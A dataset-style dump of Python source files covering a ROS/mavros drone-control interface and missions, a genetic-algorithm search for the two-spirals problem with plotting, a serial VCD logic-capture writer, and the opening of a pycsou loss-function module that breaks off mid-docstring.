metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "joanreyero/pyx4",
"score": 2
} |
#### File: src/pyx4_base/mavros_interface.py
```python
from __future__ import division
import numpy as np
from threading import Thread, Lock
import rospy
import sys
from mavros_msgs.msg import Altitude, ExtendedState, HomePosition, State, WaypointList, OpticalFlowRad, PositionTarget
from mavros_msgs.srv import CommandBool, ParamGet, ParamSet, SetMode, WaypointClear, WaypointPush, CommandTOL, CommandHome
from geometry_msgs.msg import PoseStamped, TwistStamped
from nav_msgs.msg import Odometry
from sensor_msgs.msg import NavSatFix, Range
from std_msgs.msg import Float64, Float32
from tf.transformations import euler_from_quaternion
from definitions_pyx4 import *
from definitions_pyx4 import MAV_VTOL_STATE, LANDED_STATE, MAV_STATE
class Mavros_interface(object):
# todo - add mavros ns to topics
def __init__(self,
ros_rate=10, # slow as nothing happens in the main loop
state_estimation_mode=State_estimation_method.GPS,
enforce_height_mode_flag=False,
height_mode_req=0,
):
self.sem = state_estimation_mode
self._node_alive = True
self.ros_rate = ros_rate
self.wd_initialised = False
self.wd_fault_detected = False
self.fault_this_loop = False
# initialise data containers
self.altitude = Altitude()
self.altitude_bottom_clearance = Float32()
self.extended_state = ExtendedState()
self.global_position = NavSatFix()
self.optic_flow_raw = OpticalFlowRad()
self.optic_flow_range = Range()
self.home_position = HomePosition()
self.local_position = PoseStamped()
# self.gt_position = PoseStamped()
self.mission_wp = WaypointList()
self.state = State()
self.mocap_pose = PoseStamped()
self.camera_pose = PoseStamped()
self.camera_yaw = None
self.local_x = Float64().data
self.local_y = Float64().data
self.local_z = Float64().data
self.gt_x = Float64().data
self.gt_y = Float64().data
self.gt_z = Float64().data
# todo - we can probably live with just XX_vel_bod data?:
self.x_vel = Float64().data
self.y_vel = Float64().data
self.gt_x_vel = Float64().data
self.gt_y_vel = Float64().data
self.vel_ts = Float64().data
self.xy_vel = Float64().data
self.x_vel_bod = Float64().data
self.y_vel_bod = Float64().data
self.xy_vel_bod = Float64().data
self.body_yaw_rate = Float64().data
self.global_compass_hdg_deg = Float64().data
self.enforce_height_mode_flag = enforce_height_mode_flag
self.height_mode_req = height_mode_req
# threading locks
self.setpoint_lock = Lock() # used for setting lock in our setpoint publisher so that commands aren't mixed
# ROS services
service_timeout = 10
rospy.loginfo("Searching for mavros services")
try:
rospy.wait_for_service('mavros/param/get', service_timeout)
rospy.wait_for_service('mavros/param/set', service_timeout)
rospy.wait_for_service('mavros/cmd/arming', service_timeout)
rospy.wait_for_service('mavros/mission/push', service_timeout)
rospy.wait_for_service('mavros/mission/clear', service_timeout)
rospy.wait_for_service('mavros/set_mode', service_timeout)
rospy.wait_for_service('mavros/set_mode', service_timeout)
rospy.wait_for_service('/mavros/cmd/set_home')
# rospy.wait_for_service('mavros/fcu_url', service_timeout) # todo - check how this is used in px4
self.get_param_srv = rospy.ServiceProxy('mavros/param/get', ParamGet)
self.set_param_srv = rospy.ServiceProxy('mavros/param/set', ParamSet)
self.set_arming_srv = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
self.set_mode_srv = rospy.ServiceProxy('mavros/set_mode', SetMode)
self.wp_clear_srv = rospy.ServiceProxy('mavros/mission/clear', WaypointClear)
self.wp_push_srv = rospy.ServiceProxy('mavros/mission/push', WaypointPush)
self.takeoff_srv = rospy.ServiceProxy('/mavros/cmd/takeoff', CommandTOL)
self.cmd_home_srv = rospy.ServiceProxy('/mavros/cmd/set_home', CommandHome)
rospy.loginfo("Required ROS services are up")
except rospy.ROSException:
self.shut_node_down(extended_msg="failed to connect to Mavros services - was the mavros node started?")
# make sure we have information about our connection with FCU
rospy.loginfo("Get our fcu string")
try:
self.fcu_url = rospy.get_param('mavros/fcu_url')
except Exception as e:
print (e)
self.shut_node_down(extended_msg="cant find fcu url")
# ensure that our height mode is as we expect it to be (if required)
rospy.loginfo('check height_mode {}'.format(self.enforce_height_mode_flag))
if self.enforce_height_mode_flag:
# todo - allow multiple attempts at this
# res = self.mavros_interface.get_param_srv(param)
param_read_attempts = 0
try:
while param_read_attempts < 5:
res = self.get_param_srv('EKF2_HGT_MODE')
if res.success:
self.height_mode = res.value.integer
if self.height_mode == self.height_mode_req:
rospy.loginfo('height mode {} as expected'.format(self.height_mode))
break
else:
raise Exception ("height mode is {} - (expected heightmode is {}) change parameter with QGround control and try again".format(self.height_mode, self.height_mode_req))
break
else:
rospy.logerr( "Couldn't read EKF2_HGT_MODE param on attempt {} - trying again".format(param_read_attempts))
param_read_attempts += 1
rospy.sleep(2)
except Exception as e:
rospy.logerr(
"Couldn't read EKF2_HGT_MODE - shutting down".format(param_read_attempts))
self.shut_node_down(extended_msg= "height_mode error - traceback is {}".format(e))
# todo: ensure that our state estimation parameters are as available (this requires the state estimation
# topic name so can't test this until we do something with mocap again) Actually, we can incorporate this into
# the watchdog
# if state_estimation_mode == State_estimation_method.MOCAP:
# ROS subscribers
self.alt_sub = rospy.Subscriber('mavros/altitude', Altitude, self.altitude_callback)
self.ext_state_sub = rospy.Subscriber('mavros/extended_state',ExtendedState,self.extended_state_callback)
self.global_pos_sub = rospy.Subscriber('mavros/global_position/global',NavSatFix, self.global_position_callback)
self.optic_flow_raw_sub = rospy.Subscriber('mavros/px4flow/raw/optical_flow_raw',OpticalFlowRad, self.optic_flow_raw_callback)
self.optic_flow_range_sub = rospy.Subscriber('mavros/px4flow/ground_distance',Range,self.optic_flow_range_callback)
self.home_pos_sub = rospy.Subscriber('mavros/home_position/home', HomePosition, self.home_position_callback)
self.local_pos_sub = rospy.Subscriber('mavros/local_position/pose', PoseStamped, self.local_position_callback)
self.mission_wp_sub = rospy.Subscriber('mavros/mission/waypoints', WaypointList, self.mission_wp_callback)
self.state_sub = rospy.Subscriber('mavros/state', State, self.state_callback)
self.mocap_pos_sub = rospy.Subscriber('mavros/vision_pose/pose', PoseStamped, self.mocap_pos_callback)
# self.camera_pose_sub = rospy.Subscriber(self.camera_pose_topic_name, PoseStamped, self.cam_pose_cb)
# todo - add check for this signal to watchdog - or remap /mavros/local_position/velocity -> /mavros/local_position/velocity_local
self.velocity_local_sub = rospy.Subscriber('/mavros/local_position/velocity_local', TwistStamped, self.vel_callback)
self.velocity_body_sub = rospy.Subscriber('/mavros/local_position/velocity_body', TwistStamped, self.vel_bod_callback)
self.compass_sub = rospy.Subscriber('/mavros/global_position/compass_hdg', Float64, self.compass_hdg_callback)
self.ground_truth_sub = rospy.Subscriber('/body_ground_truth', Odometry, self.gt_position_callback)
## Ros publishers
self.local_pos_pub_raw = rospy.Publisher('mavros/setpoint_raw/local', PositionTarget, queue_size=1)
# ROS topics - this must come after our ROS subscribers
topics_timeout = 30
rospy.loginfo("waiting for ROS topics")
try:
# check that essential messages are being subscribed to regularly
for _ in np.arange(2):
rospy.wait_for_message('mavros/local_position/pose', PoseStamped, topics_timeout)
rospy.wait_for_message('mavros/extended_state', ExtendedState, topics_timeout)
except rospy.ROSException:
self.shut_node_down(extended_msg="Required ros topics not published")
rospy.loginfo("ROS topics are up")
# create a watchdog thread that checks topics are being received at the expected rates
self.watchdog_thread = Thread(target=self.watchdog, args=())
self.watchdog_thread.daemon = True
self.watchdog_thread.start()
def run(self):
rate = rospy.Rate(self.ros_rate)
while not rospy.is_shutdown() and self._node_alive:
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logwarn(('Mavros interface error is :', e))
def shut_node_down(self, extended_msg=''):
self._node_alive = False
rospy.logerr('mavros interface node is shutting down ' + extended_msg)
sys.exit()
###########################################
# Frequently used properties
###########################################
@property
def yaw_local(self):
orientation_q = self.local_position.pose.orientation
(_, _, yaw) = euler_from_quaternion([orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w])
return yaw
###########################################
# ROS callback functions
###########################################
def altitude_callback(self, data):
self.altitude = data
self.altitude_bottom_clearance = data.bottom_clearance
def extended_state_callback(self, data):
if self.extended_state.vtol_state != data.vtol_state:
rospy.loginfo("VTOL state changed from {0} to {1}".format(
MAV_VTOL_STATE(self.extended_state.vtol_state).name, MAV_VTOL_STATE(data.vtol_state).name))
if self.extended_state.landed_state != data.landed_state:
rospy.loginfo("landed state changed from {0} to {1}".format(
LANDED_STATE(self.extended_state.landed_state).name, LANDED_STATE(data.landed_state).name))
self.extended_state = data
def global_position_callback(self, data):
self.global_position = data
def optic_flow_raw_callback(self, data):
self.optic_flow_raw = data
def optic_flow_range_callback(self, data):
self.optic_flow_range = data
def home_position_callback(self, data):
self.home_position = data
def local_position_callback(self, data):
self.local_position = data
self.local_x = self.local_position.pose.position.x
self.local_y = self.local_position.pose.position.y
self.local_z = self.local_position.pose.position.z
# self.local_pos = np.array((self.local_x, self.local_y, self.local_z))
def gt_position_callback(self, odom):
self.gt_x = odom.pose.pose.position.x
self.gt_y = odom.pose.pose.position.y
self.gt_z = odom.pose.pose.position.z
self.gt_x_vel = odom.twist.twist.linear.x
self.gt_y_vel = odom.twist.twist.linear.y
def mission_wp_callback(self, data):
if self.mission_wp.current_seq != data.current_seq:
rospy.loginfo("current mission waypoint sequence updated: {0}".
format(data.current_seq))
self.mission_wp = data
def state_callback(self, data):
if self.state.armed != data.armed:
rospy.loginfo("armed state changed from {0} to {1}".format(
self.state.armed, data.armed))
if self.state.connected != data.connected:
rospy.loginfo("connected changed from {0} to {1}".format(
self.state.connected, data.connected))
if self.state.mode != data.mode:
rospy.loginfo("mode changed from {0} to {1}".format(
self.state.mode, data.mode))
if self.state.system_status != data.system_status:
rospy.loginfo("system_status changed from {0} to {1}".format(
MAV_STATE(self.state.system_status).name, MAV_STATE(data.system_status).name))
self.state = data
def mocap_pos_callback(self, data):
self.mocap_pose = data
def vel_callback(self, data):
## Coordinate frame for local pos (note this is relative to a fixed frame of reference and is not in the body
# frame) to the take off point, appears to be: X: forward, Y: Left, Z: up
self.vel_ts = data.header.stamp.to_sec()
self.x_vel = data.twist.linear.x
self.y_vel = data.twist.linear.y
self.xy_vel = np.linalg.norm((data.twist.linear.x, data.twist.linear.y))
def vel_bod_callback(self, data):
## Coordinate frame for local pos (note this is relative to a fixed frame of reference and is not in the body
# frame) to the take off point, appears to be: X: forward, Y: Left, Z: up
self.x_vel_bod = data.twist.linear.x
self.y_vel_bod = data.twist.linear.y
self.xy_vel_bod = np.linalg.norm((data.twist.linear.x, data.twist.linear.y))
self.body_yaw_rate = data.twist.angular.z
def compass_hdg_callback(self, data):
self.global_compass_hdg_deg = data.data
# def cam_pose_cb(self, this_pose):
# self.camera_pose = this_pose
# self.camera_yaw = self.pose2yaw(this_pose=self.camera_pose)
def watchdog(self):
"""
We ensure that data is A) present and B) once the watchdog is initialised, we ensure that data is coming in
periodically.
"""
# todo: consider monitoriing the following topics
# gps_topics = ['global_pos', 'home_pos', 'mission_wp']
# vision_topics = ['vision_pose']
# main_topics = ['alt', 'ext_state', 'local_pos', 'state']
#
rate = rospy.Rate(0.5)
time_last_msg = rospy.get_time()
while not rospy.is_shutdown() and self._node_alive:
time_this_run = rospy.get_time()
time_delta = time_this_run - time_last_msg
time_last_msg = time_this_run
#
self.fault_this_loop = False
try:
if (self.state.header.stamp.secs + 2.5) < rospy.get_time():
rospy.logwarn(('not receiving state message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
try:
if (self.local_position.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving local position message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
################################################### Check our state estimation status
if self.sem is State_estimation_method.UNKNOWN:
#
pass
if self.sem is State_estimation_method.MOCAP:
try:
if (self.mocap_pose.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving mocap message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.sem is State_estimation_method.GPS:
try:
if (self.global_position.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving global position message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.sem is State_estimation_method.OPTIC_FLOW:
try:
if (self.optic_flow_raw.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn((self.optic_flow_raw.header.stamp.secs + 2.0), rospy.get_time())
rospy.logwarn(('not receiving optic flow message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.wd_initialised and self.fault_this_loop:
self.wd_fault_detected = True
# watchdog is initised when all conditions are met
if not self.wd_initialised and not self.fault_this_loop:
rospy.loginfo('enabling watchdog')
self.wd_initialised = True
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
rospy.init_node('mavros_interface_node', anonymous=True, log_level=rospy.DEBUG)
# todo - add sem here if this will be used as a ros node
mri = Mavros_interface()
mri.run()
```
#### File: src/pyx4_base/pyx4_base.py
```python
from __future__ import division
from setpoint_publisher import *
from mavros_interface import *
from definitions_pyx4 import *
from mission_states import *
from threading import Thread
from commander import *
from pyx4.msg import pyx4_state as Pyx4_msg
# todo - re-add state estimation options
# todo - create a message that is published when the flight state changes
class Pyx4_base(object):
"""
A class for controlling a px4 flight control unit via ROS (using the mavros package).
NB. Mavros must be started elsewhere for this node to initialise properly
"""
def __init__(self,
flight_instructions,
node_name='pyx4_node',
rospy_rate=2,
mavros_ns='',
state_estimation_mode=State_estimation_method.GPS,
enforce_height_mode_flag=False,
height_mode_req=0,
enforce_sem_mode_flag=False,
start_authorised=True,
):
self.node_alive = True
self.mavros_ns = mavros_ns
self._run_rate=rospy_rate
self.state_estimation_mode = state_estimation_mode
self.enforce_height_mode_flag = enforce_height_mode_flag
self.height_mode_req = height_mode_req
self.start_authorised = start_authorised
# create pyx4_base state publisher
self.pyx4_state_msg_pub = rospy.Publisher(node_name + '/pyx4_state', Pyx4_msg, queue_size=5)
self.pyx4_state_msg = Pyx4_msg()
self.pyx4_state_msg.flight_state = 'Not_set'
self.pyx4_state_msg.state_label = 'Not_set'
# get robot type - it is essential that this environmental variable is written so that we know is its a robot
# or a simulation
try:
self.robot_type = os.environ['ROBOT_TYPE']
except Exception as e:
rospy.logerr("couldn't find mandatory environmenatal variable: 'ROBOT_TYPE' - has this been set?")
self.shut_node_down()
# start mavros interface thread
self.mavros_interface = Mavros_interface(
state_estimation_mode=self.state_estimation_mode,
enforce_height_mode_flag=self.enforce_height_mode_flag,
height_mode_req=self.height_mode_req
)
self.mavros_interface_thread = Thread(target=self.mavros_interface.run, args=())
self.mavros_interface_thread.daemon = True
self.mavros_interface_thread.start()
rospy.loginfo('Pyx4_deprecated -> Mavros interface thread initialised')
# initialise the watchdog and wait until
wait_for_watchdog_rate = rospy.Rate(1)
while not rospy.is_shutdown() and not self.mavros_interface.wd_initialised:
rospy.loginfo('[pyx4_v2]: Waiting for the pyx4_base watchdog to inilialise')
# todo - report what is preventing watchdog from completing
wait_for_watchdog_rate.sleep()
rospy.loginfo('Pyx4_deprecated watchdog initialised')
# start commander thread
# todo - add commander.mission_failed state - so that calling methods know when to give up
self.commander = Commander(
flight_instructions=flight_instructions, # a list of all the flight instructions
mavros_interface_node=self.mavros_interface,
commander_parent_ref=self,
start_authorised=start_authorised,
)
self.commander_thread = Thread(target=self.commander.run, args=())
self.commander_thread.daemon = True
if start_authorised:
self.commander_thread.start()
rospy.loginfo('commander initialised')
# start setpoint publisher thread
self.sp_pub_thread = Thread(target=setpoint_publisher, args=(self.mavros_interface, self.commander))
self.sp_pub_thread.daemon = True
if start_authorised:
self.sp_pub_thread.start()
rospy.loginfo('sp pub initialised')
def publish_pyx4_state(self):
self.pyx4_state_msg.header.stamp = rospy.Time.now()
self.pyx4_state_msg_pub.publish(self.pyx4_state_msg)
def do_delayed_start(self):
"""
provides a mechanism for pyx4_base to initialise (and start mavros) without starting the commander threads
handy if other preconditions need to be waited for before starting the mission
"""
self.commander_thread.start()
rospy.loginfo('commander initialised')
self.sp_pub_thread.start()
rospy.loginfo('sp pub initialised')
def run(self):
""" Keep nodes alive until exit conditions present """
rate = rospy.Rate(self._run_rate)
while not rospy.is_shutdown() and self.commander._node_alive and self.mavros_interface._node_alive:
try:
rate.sleep()
except:
self.shut_node_down()
# todo - return true if mission succesful and false if not - how to check this if the commander shuts down?
def shut_node_down(self, shutdown_message='shutting down'):
self.node_alive = False
rospy.signal_shutdown(shutdown_message)
sys.exit(1)
def fail(self, e=None):
rospy.logwarn(('Pyx4_deprecated v2 error is :', e))
if __name__ == '__main__':
node_name = 'pyx4_node'
rospy.init_node(node_name, anonymous=True, log_level=rospy.DEBUG)
flight_instructions = {0: Arming_state(timeout=90.0,), 1: Take_off_state(), 2: Landing_state()}
parser = argparse.ArgumentParser(description="This node is a ROS side mavros based state machine.")
parser.add_argument('-n', '--mavros-ns', help="ROS node namespace",
default='mavros') # JS - changed as mavros.DEFAULT_NAMESPACE doesn't seem to exist anymore - todo - is there a new enum for this?
# parser.add_argument('-f', '--mission-file', help="which mission .csv file we will use to outline our mission",
# default='basic_wpts')
# parser.add_argument('-s', '--state-estimation-type', help="which sensing modality is used for state estimation",
# default='GPS')
parser.add_argument('--enforce_hgt_mode_flag', type=bool, default=False)
parser.add_argument('--height_mode_req', type=int, default=0)
parser.add_argument('--state_estimation', type=int, default=0)
args = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
# flight_instructions = {0: Take_off_state()}
# mission_file = os.path.join(MISSION_SPECS, 'big_square.csv')
# flight_instructions = Wpts_from_csv(file_path=mission_file)
pyx4 = Pyx4_base(flight_instructions=flight_instructions,
enforce_height_mode_flag=args.enforce_hgt_mode_flag,
height_mode_req=args.height_mode_req,
)
pyx4.run()
```
#### File: src/pyx4_base/survey_mission.py
```python
from __future__ import division
import csv
import numpy as np
import ast
import argparse
from mission_states import *
from src.src.pyx4 import Pyx4_base
from mavros_msgs.msg import PositionTarget
from warnings import warn
def Survey_mission(
mission_type='hover',
control_type='pos',
duration=30,
height=3.0,
heading=0.0,
x_length=1.0,
y_length=10.0,
x_offset=1.0,
y_offset=1.0,
width_between_runs=3.0,
z_tgt_rel=0.0,
radius=5.0,
):
'''
this mission type wasn't completed as there wasn't a good way of limiting the velocity of the waypoints while
in offboard and position control modes
Allows some user to input a simple rectanular area for surveying.
NB. Px4/QGroundcontrol already has a nice tool for this - here I just wanted something quick and dirty to use in my
ros setup that already has functins for triggering the camera
The following parameters are provided: heading, x and y parameters ...
:param file_path:
:return:
'''
warn("this mission type wasn't completed as there wasn't a good way of limiting the velocity of the waypoints while"
" in offboard and position control modes")
instructions = {}
instruction_cnt = 0
# create test grid based on x & y length specifications
x_initial = - np.ceil(y_length / 2.0)
y_initial = 0.0
qty_ys = (np.ceil(y_length / width_between_runs) * 2).astype(np.int)
# generate x positions
ys = np.arange(x_initial, -x_initial+width_between_runs, width_between_runs)
ys_all = np.empty((ys.size + ys.size,), dtype=ys.dtype)
ys_all[0::2] = ys
ys_all[1::2] = ys
# generate y positions
reps = np.int(np.ceil(qty_ys/4.))
xs_all = np.tile(np.array((y_initial, y_length, y_length, y_initial)), 10) [0:len(ys_all)]
# append home to our target
################# Common instructions -> arm & take offf
instructions[instruction_cnt] = Arming_state(
timeout=90
)
instruction_cnt += 1
instructions[instruction_cnt] = Take_off_state(
# instruction_type='hold',
to_altitude_tgt=height,
yaw_type='pos',
heading_tgt_rad=heading,
timeout=30,
)
instruction_cnt += 1
################################### main loop
for x_tgt, y_tgt in zip(xs_all, ys_all):
print ('generating waypoint at {}, {} '.format(x_tgt, y_tgt))
instructions[instruction_cnt] = Waypoint_state(
timeout=duration,
state_label='Going out',
waypoint_type='pos',
xy_type='pos_with_vel',
x_setpoint=x_tgt,
y_setpoint=y_tgt,
x_vel_setpoint=1.0,
y_vel_setpoint=1.0,
z_type='pos',
z_setpoint=height,
yaw_type='pos',
yaw_setpoint=heading,
coordinate_frame=PositionTarget.FRAME_LOCAL_NED,
)
instruction_cnt = instruction_cnt + 1
################################### return to home
instructions[instruction_cnt] = Waypoint_state(
state_label='Hovering',
waypoint_type='pos',
timeout=duration,
xy_type='pos',
x_setpoint=0,
y_setpoint=0,
z_type='pos',
z_setpoint=height,
yaw_type='pos',
yaw_setpoint=heading,
coordinate_frame=PositionTarget.FRAME_LOCAL_NED,
)
instruction_cnt = instruction_cnt + 1
######################################################################################################
################################## Landing instruction ###############################################
instructions[instruction_cnt] = Landing_state()
instruction_cnt += 1
print xs_all
print ys_all
return instructions
# translate gid points based on the offset
# rotate grid points based on heading
# plot and record coordinates of way points
if __name__ == '__main__':
# parser = argparse.ArgumentParser(description="Generates a mission from a simple argument list")
#
# # # parser.add_argument('-m', '--mission_type', type=str, default='hover')
# # parser.add_argument('-m', '--mission_type',
# # type=lambda x: is_valid_option(parser, x, VALID_MISSIONS),
# # help="Checks if mission is a valid option",
# # default='hover'
# # )
# #
# # parser.add_argument('-d', '--duration', type=float, default=10.0)
# # parser.add_argument('-a', '--altitude', type=float, default=5.0)
# # parser.add_argument('--vel_cap', type=bool, default=3.0)
# #
# # parser.add_argument('-c', '--control_type',
# # type=lambda x: is_valid_option(parser, x, VALID_CONTROL_TYPES),
# # help="Checks if control type is a valid option",
# # default='pos',
# # )
#
# parser.add_argument('-x', '--x_tgt', type=float, default=3.0)
# parser.add_argument('-y', '--y_tgt', type=float, default=3.0)
# parser.add_argument('-z', '--z_tgt_rel', type=float, default=3.0)
# parser.add_argument('-r', '--radius', type=float, default=3.0)
# parser.add_argument('--heading', type=float, default=0.0)
#
# args = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
#
#
# # todo apply vel cap and warn if effected
# # todo - default duration shorter if control type is vel
flight_instructions = Survey_mission(
# mission_type=args.mission_type,
# control_type=args.control_type,
# duration=args.duration,
# height=args.altitude,
# heading=args.heading,
# # x_tgt=args.x_tgt,
# # y_tgt=args.y_tgt,
# z_tgt_rel=args.z_tgt_rel,
# radius=args.radius,
)
rospy.init_node('pyx4_survey_node', anonymous=True, log_level=rospy.DEBUG)
pyx4 = Pyx4_base(flight_instructions=flight_instructions)
pyx4.run()
flight_instructions = Survey_mission()
```
#### File: src/pyx4_base/transistions_test2.py
```python
from transitions import Machine
from time import sleep
from random import choice
class Passport_cam_sm(object):
def __init__(self):
self._face_okay = False
self._height_okay = False
def face_ok(self, even_data):
self._face_okay = choice([True, False])
return self._face_okay
def height_ok(self, even_data):
# tol = even_data.kwargs.pop('tol', 0.5)
self._height_okay = choice([True, False])
return self._height_okay
states = ['move2face', 'validate_face', 'open_gate']
transitions = [
{'trigger': 'check', 'source': 'move2face', 'dest': 'validate_face',
'conditions': ['height_ok', 'face_ok']},
{'trigger': 'check', 'source': 'validate_face', 'dest': 'open_gate',
'conditions': 'face_ok'}, # (1)
{'trigger': 'check', 'source': 'validate_face', 'dest': 'move2face'}, # (2)
{'trigger': 'check', 'source': 'open_gate', 'dest': 'move2face'}, # (2)
]
class Passport_cam(object):
def __init__(self):
self.model = Passport_cam_sm()
self.machine = Machine(model=self.model, states=states, transitions=transitions,
initial='move2face', send_event=True)
self.running = True
def run(self):
while self.running:
print('At state ' + self.model.state)
#while not self.model.check():
self.model.check()
sleep(1)
def camera_dynamics(self):
print("Processing...")
self.running = False
pc = Passport_cam()
pc.run()
print('Done')
``` |
{
"source": "joanreyero/two-spirals",
"score": 3
} |
#### File: two-spirals/python/ga-two-spirals.py
```python
from modgeneticalgorithm import geneticalgorithm as ga
from fitness import get_fitness
import numpy as np
def fitness_for_test(X):
targ = 8880141
return np.sqrt((targ - sum(X)) ** 2) / targ
algorithm_param = {'max_num_iteration': 4000,
'population_size':20,
'mutation_probability':0.1,
'elit_ratio': 0.01,
'crossover_probability': 0.5,
'parents_portion': 0.3,
'crossover_type':'uniform',
'max_iteration_without_improv': 20}
"""
Activations: (each corresponds to an element of the list, in order)
- First 6 are hidden layers with the range of hidden units
- Algorithm: [0, 1] (range 0 to 1; 0 for PSO, 1 for SGD)
- Activation: [0, 4] (0: ReLU, 1: TanH, 2: Sigmoid, 3: Sin, 4: RBF)
- Inputs: [0, 1] (whether we leave x**2 or not)
"""
varbound_ga = np.array([
[0, 8], # HL 1
[0, 8], # HL 2
[0, 8], # HL 3
[0, 0], # HL 4
[0, 0], # HL 5
[0, 0], # HL 6
[1, 1], # PSO
[1, 1], # TanH
[0, 0], # No x**2
])
varbound_gp = np.array([
[6, 6], # HL 1
[0, 0], # HL 2
[0, 0], # HL 3
[0, 0], # HL 4
[0, 0], # HL 5
[0, 0], # HL 6
[0, 1], # PSO or SGD
[0, 4], # 0: ReLU, 1: TanH, 2: Sigmoid, 3: Sin, 4: RBF
[0, 1], # x**2 or not
])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--type', '-t', type=str, default='ga',
help='ga or gp')
parser.add_argument('--file', '-f', type=str, default='temp',
help="filename to save results")
args = parser.parse_args()
if args.type == 'ga':
varbound = varbound_ga
elif args.type == 'gp':
varbound = varbound_gp
model=ga(function=get_fitness, dimension=9, variable_type='int',variable_boundaries=varbound, algorithm_parameters=algorithm_param, function_timeout=4000, filename=args.file)
model.run()
```
#### File: two-spirals/python/plotter.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
ITER, FITNESS, TIME = 'iter', 'best_fitness', 'time'
def plot_fitness_time(ts, f, title, save):
start_t = ts[0]
ts = [int(t - start_t) for t in ts]
plt.plot(ts, f, '-o', color='orange')
plt.xlabel('Time (s)')
plt.title('Fitness over time for a ' + title)
plt.savefig(f'figures/time-{save}.pdf')
#plt.show()
def plot_joint(ts, f, interval, title, save):
start_t = ts[0]
ts = [int(t - start_t) for t in ts]
print(int(ts[-1] - ts[0]) / 3600.0)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax2.grid(which='both', alpha=0.5)
ax1.plot(ts, f, '-o', color='green', markersize=3)
ax1.set_xlabel("Time (s)")
new_tick_locations = [t for i, t in enumerate(ts) if i % interval == 0]
def tick_function(X, interval):
return interval * np.array(range(len(X)))
ax2.set_xlim(ax1.get_xlim())
ax2.set_xticks(new_tick_locations)
ax2.set_xticklabels(tick_function(new_tick_locations, interval))
ax2.set_xlabel("Iteration")
fig.suptitle('Evolution of a ' + title)
fig.tight_layout(rect=[0, 0.03, 1, 0.95])
plt.savefig(f'figures/joint-{save}.pdf')
#plt.show()
def plot_fitness_iter(i, f, title, save):
fig = plt.figure()
plt.plot(i, f, '-o', color='green')
plt.xlabel('Iteration')
plt.title('Fitness per iteration for a ' + title)
plt.savefig(f'figures/iter-{save}.pdf')
#plt.show()
def main(file, interval, title, save=True):
if save:
save = file
data = pd.read_csv(f'csv/{file}.csv')
#plot_fitness_iter(data[ITER], data[FITNESS], title, save)
#plot_fitness_time(data[TIME], data[FITNESS], title, save)
plot_joint(data[TIME], data[FITNESS], interval, title, save)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--file', '-f', type=str, default='temp',
help="filename (without .csv)")
parser.add_argument('--save', '-s', type=bool, default=True,
help="save?")
parser.add_argument('--title', '-t', type=str, default="GP with maximum 3 HLs",
help="figure title")
parser.add_argument('--interval', '-i', type=int, default=2,
help="Interval for joint plotting")
args = parser.parse_args()
main(args.file, args.interval, args.title, args.save)
``` |
{
"source": "joanrieu/vcd-chainsaw",
"score": 3
} |
#### File: vcd-chainsaw/sender/VcdWriter.py
```python
import serial
import sys
import time
# Open serial port
ser = serial.Serial('/dev/ttyACM0', 2000000)
# Initialize wires and wire count
wires = [-1 for i in range(2)]
# Open output file (if given)
if len(sys.argv) > 1:
file = open(sys.argv[1], "w")
else:
file = sys.stdout
def wireName(wireId):
"""Computes a VCD wire name (1 char) from a wire number."""
return chr(ord("A") + wireId)
# Write the chosen time unit
file.write("$timescale 1us $end\n")
# Write the VCD name and description of each wire
for wireId in range(len(wires)):
file.write("$var wire 1 %c Digital%d $end\n" % (wireName(wireId), wireId))
# Time reference
startTime = time.time()
# This variable contains the int describing all the wires in one
allWires = -1
while True:
# Read the value of all ports as one integer from the serial port
allWiresOld = allWires
allWires = ord(ser.read()[0])
# Skip this value if all wires are identical
if allWires == allWiresOld:
continue
# Write the header for the new values
# TODO Replace this approximate value with a more precise one
delta = 1e6 * (time.time() - startTime)
file.write("#%d\n" % (delta))
# Write the value of each wire
for wireId in range(len(wires)):
# Extract one wire's state
wire = (allWires & 1 << wireId) >> wireId
# Skip unchanged wires
if wire == wires[wireId]:
continue
# Save the new value
wires[wireId] = wire
# Write it out
file.write("%d%s\n" % (wires[wireId], wireName(wireId)))
``` |
{
"source": "joanrue/pycsou",
"score": 2
} |
#### File: pycsou/func/loss.py
```python
r"""
Repository of common loss functionals.
"""
from pycsou.core.functional import DifferentiableFunctional, ProximableFunctional, ProxFuncPreComp
from pycsou.func.base import IndicatorFunctional
from pycsou.linop.base import DenseLinearOperator
from pycsou.func.penalty import L2Norm, L1Norm, LInftyNorm, L2Ball, L1Ball, LInftyBall, SquaredL1Norm, SquaredL2Norm
from typing import Union
from numbers import Number
import numpy as np
def ProximableLoss(func: ProximableFunctional, data: Union[Number, np.ndarray]) -> ProximableFunctional:
r"""
Constructor of proximable loss functions.
Constructs a proximable loss from a proximable functional and a data vector.
Let :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}` be some proximable functional and :math:`\mathbf{y}\in\mathbb{R}^N`.
This routine defines the loss functional :math:`F(\mathbf{x}; \mathbf{y}):= \varphi(\mathbf{x}-\mathbf{y}), \,\forall \mathbf{x}\in\mathbb{R}^N.`
Parameters
----------
func: ProximableFunctional
Some proximable functional :math:`\varphi:\mathbb{R}^N\rightarrow \mathbb{R}`.
data: Union[Number, np.ndarray]
Data vector :math:`\mathbf{y}\in\mathbb{R}^N`.
Returns
-------
